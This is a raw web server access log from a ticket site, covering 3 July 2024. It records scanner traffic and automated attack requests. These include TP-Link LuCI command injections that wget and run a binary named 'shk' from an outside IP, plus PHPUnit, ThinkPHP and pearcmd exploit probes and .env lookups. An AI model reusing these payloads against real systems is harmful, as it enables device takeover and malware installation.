146.120.18.196 - - [03/Jul/2024:00:03:07 +0200] "GET / HTTP/1.1" 404 - 94.156.68.162 - - [03/Jul/2024:00:08:31 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 66.249.66.162 - - [03/Jul/2024:00:14:42 +0200] "GET /ticket2/opencms/en/venue/?venueid=3846EEC6-D71E-F10C-9733-AF9AE6463F86 HTTP/1.1" 200 63622 52.167.144.190 - - [03/Jul/2024:00:15:51 +0200] "GET /ticket2/opencms/en/venue/?countryid=B8EC120B-4F43-C769-CF6D-BEF2F141BF54 HTTP/1.1" 200 93013 94.156.68.162 - - [03/Jul/2024:00:16:04 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 87.121.69.27 - - [03/Jul/2024:00:42:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 170.64.179.108 - - [03/Jul/2024:00:50:06 +0200] "GET /ticket2/opencms/ab2g HTTP/1.1" 404 - 170.64.179.108 - - [03/Jul/2024:00:50:07 +0200] "GET /ticket2/opencms/ab2h HTTP/1.1" 404 - 170.64.179.108 - - [03/Jul/2024:00:50:09 +0200] "GET /ticket2/opencms/alive.php HTTP/1.1" 404 - 170.64.179.108 - - [03/Jul/2024:00:50:17 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 170.64.179.108 - - [03/Jul/2024:00:50:19 +0200] "GET /ticket2/opencms/t4 HTTP/1.1" 404 - 170.64.179.108 - - [03/Jul/2024:00:50:21 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 170.64.179.108 - - [03/Jul/2024:00:50:22 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 170.64.179.108 - - [03/Jul/2024:00:50:24 +0200] "GET /ticket2/opencms/teorema505?t=1 HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:00:52:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:00:52:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 205.210.31.142 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 205.210.31.142 - - [03/Jul/2024:00:57:21 +0200] "??>]???k????s#??IZF(,??n????:?h???/?+?0?,???'?#?? ?(?$?? " 400 - 4.255.100.243 - - [03/Jul/2024:01:10:59 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 94.156.71.226 - - [03/Jul/2024:01:14:08 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 52.76.71.100 - - [03/Jul/2024:01:17:26 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 66.249.66.162 - - [03/Jul/2024:01:44:42 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/bundesliga/hannover/ HTTP/1.1" 200 69796 40.77.167.7 - - [03/Jul/2024:01:47:26 +0200] "GET /ticket2/opencms/en/venue/?countryid=A9198A40-C385-3F3F-F1E3-C36DF8CBA8BE HTTP/1.1" 200 93013 34.79.162.186 - - [03/Jul/2024:02:00:51 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 52.167.144.22 - - [03/Jul/2024:02:01:26 +0200] "GET /ticket2/opencms/en/venue/?venueid=C897D480-9FC2-C3FB-538C-8F78F6DAA600 HTTP/1.1" 200 63752 64.62.197.21 - - [03/Jul/2024:02:03:09 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 64.62.197.29 - - [03/Jul/2024:02:10:16 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 64.62.197.22 - - [03/Jul/2024:02:12:24 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 64.62.197.22 - - [03/Jul/2024:02:12:25 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 64.62.197.23 - - [03/Jul/2024:02:14:58 +0200] "GET /ticket2/opencms/geoserver/web/ HTTP/1.1" 404 - 185.224.128.63 - - [03/Jul/2024:02:17:07 +0200] "GET / HTTP/1.1" 404 - 185.224.128.63 - - [03/Jul/2024:02:17:07 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 185.224.128.63 - - [03/Jul/2024:02:17:07 +0200] "GET / HTTP/1.1" 404 - 185.224.128.63 - - [03/Jul/2024:02:17:07 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 52.76.71.100 - - [03/Jul/2024:02:28:39 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 198.235.24.213 - - [03/Jul/2024:02:30:48 +0200] "GET / HTTP/1.0" 404 - 172.105.128.12 - - [03/Jul/2024:02:41:32 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 205.210.31.40 - - [03/Jul/2024:02:42:49 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:02:48:27 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:02:48:27 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 77.90.7.116 - - [03/Jul/2024:02:48:28 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:02:48:28 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 198.235.24.60 - - [03/Jul/2024:02:48:28 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 198.235.24.60 - - [03/Jul/2024:02:48:30 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 114.119.136.185 - - [03/Jul/2024:02:48:35 +0200] "GET /ticket2/opencms/en/venue/?venueid=47A584F0-253C-EAFC-960C-A197E0BFF841 HTTP/1.1" 200 63615 172.104.131.24 - - [03/Jul/2024:02:51:12 +0200] "GET /ticket2/opencms/?20628182016134805143312Ex HTTP/1.1" 302 - 185.115.9.233 - - [03/Jul/2024:03:04:54 +0200] "GET / HTTP/1.1" 404 - 66.249.66.161 - - [03/Jul/2024:03:14:41 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/uefa-champions-league/dortmund/ HTTP/1.1" 200 70095 77.90.7.23 - - [03/Jul/2024:03:27:19 +0200] "GET / HTTP/1.1" 404 - 77.90.7.23 - - [03/Jul/2024:03:27:19 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 77.90.7.23 - - [03/Jul/2024:03:27:19 +0200] "GET / HTTP/1.1" 404 - 77.90.7.23 - - [03/Jul/2024:03:27:19 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 45.83.65.174 - - [03/Jul/2024:03:37:46 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.83.66.122 - - [03/Jul/2024:03:37:47 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 45.83.66.50 - - [03/Jul/2024:03:37:48 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 87.121.69.27 - - [03/Jul/2024:03:37:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 172.105.128.11 - - [03/Jul/2024:03:37:53 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.148.10.174 - - [03/Jul/2024:03:43:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:03:43:25 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 152.32.206.83 - - [03/Jul/2024:03:56:32 +0200] "GET / HTTP/1.1" 404 - 152.32.206.83 - - [03/Jul/2024:03:56:32 +0200] "???%?? 0C???'?iZ ???D??(I?_?Z " 400 - 152.32.206.83 - - [03/Jul/2024:03:56:33 +0200] "t3 12.1.2 " 400 - 165.227.227.46 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 64.226.79.183 - - [03/Jul/2024:04:08:06 +0200] "GET / HTTP/1.1" 404 - 52.167.144.20 - - [03/Jul/2024:04:31:53 +0200] "GET /ticket2/opencms/en/venue/?venueid=D8748AFA-5CFF-8E2A-FC7D-F16F92ED4536 HTTP/1.1" 200 63621 64.62.197.172 - - [03/Jul/2024:04:40:18 +0200] "GET / HTTP/1.1" 404 - 64.62.197.176 - - [03/Jul/2024:04:40:48 +0200] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.168 - - [03/Jul/2024:04:41:07 +0200] "GET /?format=json HTTP/1.1" 404 - 64.62.197.175 - - [03/Jul/2024:04:41:19 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 - 13.91.164.133 - - [03/Jul/2024:05:20:21 +0200] "{w ?? " 400 - 162.142.125.200 - - [03/Jul/2024:05:24:23 +0200] "GET /ticket2/opencms/ HTTP/1.1" 500 - 162.142.125.200 - - [03/Jul/2024:05:24:28 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 162.142.125.200 - - [03/Jul/2024:05:24:46 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 162.142.125.200 - - [03/Jul/2024:05:24:49 +0200] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406 110.14.63.54 - - [03/Jul/2024:05:35:37 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:37 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:38 +0200] "GET /ticket2/opencms/vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:38 +0200] "GET /ticket2/opencms/vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:39 +0200] "GET /ticket2/opencms/vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:39 +0200] "GET /ticket2/opencms/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:40 +0200] "GET /ticket2/opencms/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:40 +0200] "GET /ticket2/opencms/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:41 +0200] "GET /ticket2/opencms/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:41 +0200] "GET /ticket2/opencms/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:41 +0200] "GET /ticket2/opencms/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:42 +0200] "GET /ticket2/opencms/lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:42 +0200] "GET /ticket2/opencms/lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:43 +0200] "GET /ticket2/opencms/lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:43 +0200] "GET /ticket2/opencms/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:44 +0200] "GET /ticket2/opencms/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:44 +0200] "GET /ticket2/opencms/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:45 +0200] "GET /ticket2/opencms/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:45 +0200] "GET /ticket2/opencms/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:46 +0200] "GET /ticket2/opencms/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:46 +0200] "GET /ticket2/opencms/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:47 +0200] "GET /ticket2/opencms/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:47 +0200] "GET /ticket2/opencms/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:48 +0200] "GET /ticket2/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:48 +0200] "GET /ticket2/opencms/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:49 +0200] "GET /ticket2/opencms/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:49 +0200] "GET /ticket2/opencms/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:50 +0200] "GET /ticket2/opencms/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:50 +0200] "GET /ticket2/opencms/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:51 +0200] "GET /ticket2/opencms/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:51 +0200] "GET /ticket2/opencms/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:52 +0200] "GET /ticket2/opencms/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:52 +0200] "GET /ticket2/opencms/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:53 +0200] "GET /ticket2/opencms/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:53 +0200] "GET /ticket2/opencms/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:53 +0200] "GET /ticket2/opencms/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:54 +0200] "GET /ticket2/opencms/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:54 +0200] "GET /ticket2/opencms/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:55 +0200] "GET /ticket2/opencms/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:55 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 404 - 110.14.63.54 - - [03/Jul/2024:05:35:56 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 - 45.156.129.46 - - [03/Jul/2024:05:39:11 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.156.129.46 - - [03/Jul/2024:05:39:12 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 45.156.129.46 - - [03/Jul/2024:05:39:26 +0200] "GET /ticket2/opencms/wp-content/plugins/wp-time-capsule/readme.txt HTTP/1.1" 404 - 13.91.165.251 - - [03/Jul/2024:05:44:39 +0200] "GET /ticket2/opencms/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 - 45.156.128.39 - - [03/Jul/2024:05:57:47 +0200] "GET / HTTP/1.1" 404 - 149.50.103.48 - - [03/Jul/2024:06:41:38 +0200] "GET / HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:06:51:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:06:51:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 87.121.69.27 - - [03/Jul/2024:07:05:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 45.156.129.54 - - [03/Jul/2024:07:17:56 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 - 149.50.103.48 - - [03/Jul/2024:07:39:37 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [03/Jul/2024:07:53:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 147.185.132.28 - - [03/Jul/2024:07:55:08 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 83.97.73.245 - - [03/Jul/2024:08:34:05 +0200] "GET /ticket2/opencms/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 - 83.97.73.245 - - [03/Jul/2024:08:34:09 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 134.209.74.100 - - [03/Jul/2024:08:40:11 +0200] "POST /v1/statement HTTP/1.1" 404 - 173.255.224.166 - - [03/Jul/2024:08:40:11 +0200] "GET / HTTP/1.1" 404 - 142.93.0.200 - - [03/Jul/2024:08:40:13 +0200] "GET / HTTP/1.1" 404 - 45.33.55.193 - - [03/Jul/2024:08:40:21 +0200] "GET / HTTP/1.1" 404 - 45.33.55.193 - - [03/Jul/2024:08:40:21 +0200] "GET /auth.html HTTP/1.1" 404 - 45.33.55.193 - - [03/Jul/2024:08:40:21 +0200] "GET /auth1.html HTTP/1.1" 404 - 45.33.55.193 - - [03/Jul/2024:08:40:21 +0200] "GET /sslvpnLogin.html HTTP/1.1" 404 - 45.33.55.193 - - [03/Jul/2024:08:40:21 +0200] "GET /api/sonicos/auth HTTP/1.1" 404 - 45.33.55.193 - - [03/Jul/2024:08:40:21 +0200] "GET /api/sonicos/tfa HTTP/1.1" 404 - 66.228.60.75 - - [03/Jul/2024:08:44:35 +0200] "GET / HTTP/1.0" 404 - 176.97.210.250 - - [03/Jul/2024:09:10:15 +0200] "GET /geoserver/wms HTTP/1.1" 404 - 149.50.103.48 - - [03/Jul/2024:09:20:09 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [03/Jul/2024:09:23:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 167.94.138.34 - - [03/Jul/2024:09:36:53 +0200] "GET / HTTP/1.1" 404 - 167.94.138.34 - - [03/Jul/2024:09:37:05 +0200] "GET / HTTP/1.1" 404 - 167.94.138.34 - - [03/Jul/2024:09:37:06 +0200] "PRI * HTTP/2.0" 505 - 94.156.68.162 - - [03/Jul/2024:09:47:06 +0200] "GET /ticket2/opencms/_profiler/phpinfo HTTP/1.1" 404 - 94.156.68.162 - - [03/Jul/2024:09:47:37 +0200] "GET /ticket2/opencms/_profiler/phpinfo HTTP/1.1" 404 - 185.242.226.109 - - [03/Jul/2024:09:51:39 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 185.242.226.109 - - [03/Jul/2024:09:51:40 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 47.91.125.252 - - [03/Jul/2024:09:58:09 +0200] "GET /ticket2/opencms/dns-query?dns=R6MBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:09 +0200] "POST /ticket2/opencms/dns-query HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:09 +0200] "GET /ticket2/opencms/dns-query?name=example.com&type=A HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:09 +0200] "GET /ticket2/opencms/dns-query?dns=wRsBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:10 +0200] "POST /ticket2/opencms/dns-query HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:10 +0200] "GET /ticket2/opencms/dns-query?name=example.com&type=A HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:10 +0200] "GET /ticket2/opencms/query?dns=-GUBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:10 +0200] "POST /ticket2/opencms/query HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:10 +0200] "GET /ticket2/opencms/query?name=example.com&type=A HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:10 +0200] "GET /ticket2/opencms/query?dns=vXUBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:11 +0200] "POST /ticket2/opencms/query HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:11 +0200] "GET /ticket2/opencms/query?name=example.com&type=A HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:11 +0200] "GET /ticket2/opencms/resolve?dns=ehkBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:11 +0200] "POST /ticket2/opencms/resolve HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:11 +0200] "GET /ticket2/opencms/resolve?name=example.com&type=A HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:11 +0200] "GET /ticket2/opencms/resolve?dns=zSEBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:12 +0200] "POST /ticket2/opencms/resolve HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:12 +0200] "GET /ticket2/opencms/resolve?name=example.com&type=A HTTP/1.1" 404 - 47.91.125.252 - - [03/Jul/2024:09:58:12 +0200] "GET /ticket2/opencms/?dns=ly4BAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 302 - 47.91.125.252 - - [03/Jul/2024:09:58:12 +0200] "POST /ticket2/opencms/ HTTP/1.1" 302 - 47.91.125.252 - - [03/Jul/2024:09:58:13 +0200] "GET /ticket2/opencms/?name=example.com&type=A HTTP/1.1" 302 - 47.91.125.252 - - [03/Jul/2024:09:58:13 +0200] "GET /ticket2/opencms/?dns=prEBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 302 - 47.91.125.252 - - [03/Jul/2024:09:58:13 +0200] "POST /ticket2/opencms/ HTTP/1.1" 302 - 47.91.125.252 - - [03/Jul/2024:09:58:13 +0200] "GET /ticket2/opencms/?name=example.com&type=A HTTP/1.1" 302 - 45.156.128.49 - - [03/Jul/2024:10:04:20 +0200] "GET /favicon.ico HTTP/1.1" 404 - 78.153.140.177 - - [03/Jul/2024:10:09:56 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:10:10:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 45.148.10.174 - - [03/Jul/2024:10:10:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 176.97.210.250 - - [03/Jul/2024:10:11:59 +0200] "POST /geoserver/wms HTTP/1.1" 404 - 143.198.84.185 - - [03/Jul/2024:10:25:29 +0200] "GET / HTTP/1.1" 404 - 143.198.84.185 - - [03/Jul/2024:10:25:29 +0200] "GET /download/powershell/ HTTP/1.1" 404 - 10.128.0.81 - - [03/Jul/2024:10:36:17 +0200] "GET / HTTP/1.1" 404 - 149.50.103.48 - - [03/Jul/2024:10:36:51 +0200] "GET / HTTP/1.1" 404 - 45.128.232.152 - - [03/Jul/2024:10:38:20 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 45.128.232.152 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 46.101.82.134 - - [03/Jul/2024:10:44:10 +0200] "GET / HTTP/1.1" 404 - 46.101.82.134 - - [03/Jul/2024:10:44:10 +0200] "GET /download/powershell/ HTTP/1.1" 404 - 83.97.73.245 - - [03/Jul/2024:10:45:55 +0200] "GET /ticket2/opencms/actuator/gateway/routes HTTP/1.1" 404 - 45.156.129.57 - - [03/Jul/2024:10:46:10 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.156.129.57 - - [03/Jul/2024:10:46:10 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 45.156.129.57 - - [03/Jul/2024:10:46:21 +0200] "GET /ticket2/opencms/wp-content/plugins/wp-video-lightbox/readme.txt HTTP/1.1" 404 - 20.118.64.66 - - [03/Jul/2024:10:53:59 +0200] "GET /hudson HTTP/1.1" 404 - 40.77.167.1 - - [03/Jul/2024:11:02:18 +0200] "GET /ticket2/opencms/en/venue/?countryid=431EFD4E-08D9-96D2-1220-D823702A8178 HTTP/1.1" 200 93013 91.106.193.236 - - [03/Jul/2024:11:02:50 +0200] "GET /asdadadas HTTP/1.1" 404 - 77.90.7.116 - - [03/Jul/2024:11:43:36 +0200] "GET / HTTP/1.1" 404 - 77.90.7.116 - - 